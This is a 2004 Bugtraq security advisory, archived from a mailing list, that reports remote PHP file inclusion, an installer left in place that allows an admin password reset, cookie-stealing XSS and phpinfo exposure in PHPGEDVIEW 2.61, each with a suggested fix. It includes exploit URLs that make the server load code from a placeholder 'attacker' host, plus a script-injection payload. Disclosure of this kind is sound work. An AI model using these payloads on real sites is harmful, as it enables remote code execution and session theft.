lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040106061955.1406.qmail@www.securityfocus.com>
Date: 6 Jan 2004 06:19:55 -0000
From: Vietnamese Security Group <security@...urity.com.vn>
To: bugtraq@...urityfocus.com
Subject: Vuln in PHPGEDVIEW 2.61 Multi-Problem




Tittle : Vuln in  PHPGEDVIEW  2.61
Lang : PHP  
Author : Windak
Website: www.security.com.vn
Version : PHPGEDVIEW 2.61 Multi-Problem

Introduction :

PHPGEDVIEW is program read projects GEDCOM file ( default html ) .

Bug :  

1) Php code injection : 

Rick : Hight 
- Vuln in any files : functions.php, authentication_index.php ,config_gedcom.php 

In authentication_index.php file : at line 33 : 

require $PGV_BASE_DIRECTORY."authenticate.php"; 

In functions.php file : at line 35 : 

require($PGV_BASE_DIRECTORY."functions_print.php"); 

In config_gedcom.php file :  at line 115 : 

if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"); 
else { 
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/"; 
require($THEME_DIR."theme.php"); 


Exploit  : 

http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/ 
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/ 
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/ 

Script named authenticate.php put in http://attacker/  ( or functions_print.php , theme.php put in folder /themes/standard /

FIX  : add firt line files have been vuln :  Require (config.php); 

2) Config again : 
rick: Medium 
If you not deleted editconfig.php file after install then attacker can reinstall and change password administrator .
Link : http://target/phpgedview_folder/editconfig.php 
fix : Delete editconfig.php file

3) XSS : 
Rick  : medium 

Exploit : 
http://localhost/phpgedview/search.php?action=soundex&firstname=">&lt;script&gt;alert(document.cookie)&lt;/script&gt; 

fix : 

Find : 
<input type="text" name="firstname" value="<?php if ($action=="soundex") print $firstname; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td> 
<input type="text" name="lastname" value="<?php if ($action=="soundex") print $lastname; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["search_place"]?></td><td> 
<input type="text" name="place" value="<?php if ($action=="soundex") print $place; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["search_year"]?></td><td> 
<input type="text" name="year" value="<?php if ($action=="soundex") print $year; size="20" ?>" /></td></tr> 

replace with : 

<input type="text" name="firstname" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td> 
<input type="text" name="lastname" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["search_place"]?></td><td> 
<input type="text" name="place" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["search_year"]?></td><td> 
<input type="text" name="year" value="" /></td></tr> 

4) Show info server : 
rick : low 
I can show info server 
Link: http://target/phpgedview_folder/admin.php?action=phpinfo 

fix : 
Find :  

if (!isset($action)) $action=""; 
if ($action=="phpinfo") { 
phpinfo(); 
exit; 
} 

if (!userIsAdmin(getUserName())) { 
header("Location: login.php?url=admin.php"); 
exit; 
} 

replace with : 

if (!userIsAdmin(getUserName())) { 
header("Location: login.php?url=admin.php"); 
exit; 
} 
if (!isset($action)) $action=""; 
if ($action=="phpinfo") { 
phpinfo(); 
exit; 
} 

=======================================================================
Windak - Vietnamese Security Group

www.security.com.vn 

 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ